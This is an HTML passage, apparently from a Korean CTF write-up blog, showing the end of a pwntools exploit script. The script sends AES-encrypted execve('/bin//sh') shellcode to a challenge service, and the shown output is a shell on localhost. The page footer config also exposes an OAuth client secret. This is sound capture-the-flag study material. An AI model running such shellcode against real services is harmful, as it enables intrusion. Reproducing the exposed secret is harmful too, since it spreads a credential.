class="string">b&quot;\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\xff\xff&quot;</span>   <span class="comment"># \xff\xff becomes \x0f\x05</span></span><br><span class="line"></span><br><span class="line">    key = <span class="string">b&quot;USER_SECRET_KEY!&quot;</span></span><br><span class="line">    iv = <span class="string">b&quot;a&quot;</span> * <span class="number">16</span></span><br><span class="line">    cipher = AES.new(key, AES.MODE_CBC, iv=iv)</span><br><span class="line">    ct = cipher.encrypt(<span class="string">b&quot;TRUST_CODE_ONLY!&quot;</span> + sc)</span><br><span class="line"></span><br><span class="line">    r.sendafter(<span class="string">b&quot;iv&gt;&quot;</span>, iv)</span><br><span class="line">    r.sendafter(<span class="string">b&quot;code&gt;&quot;</span>, ct)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ ./ex.py</span><br><span class="line">[+] Opening connection to localhost on port 1234: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line"> $ id</span><br><span class="line">uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)</span><br><span class="line">$</span><br></pre></td></tr></table></figure>
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/katex/dist/katex.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/markdown-it-texmath/css/texmath.min.css">

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/17/cpp-exception-handling/" rel="prev" title="C++ 예외 처리의 구현">
                  <i class="fa fa-chevron-left"></i> C++ 예외 처리의 구현
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/08/28/line22-rolling/" rel="next" title="[LINE CTF 2022] rolling">
                  [LINE CTF 2022] rolling <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class=""></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Juhyun Song</span>
</div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.1/es5/tex-mml-chtml.js","integrity":"sha256-hlC2uSQYTmPsrzGZTEQEg9PZ1a/+SV6VBCTclohf2og="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"juhyun167","repo":"juhyun167.github.io","client_id":"97ef06bf938b3dfb0c5b","client_secret":"210c90c45a592282824bbc4312dbc74b3709bbea","admin_user":"juhyun167","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"en","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.min.js","integrity":"sha256-Pmj85ojLaPOWwRtlMJwmezB/Qg8BzvJp5eTzvXaYAfA="},"path_md5":"44e47f487e5b825e710140ee2f8a7f15"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>

</body>
</html>
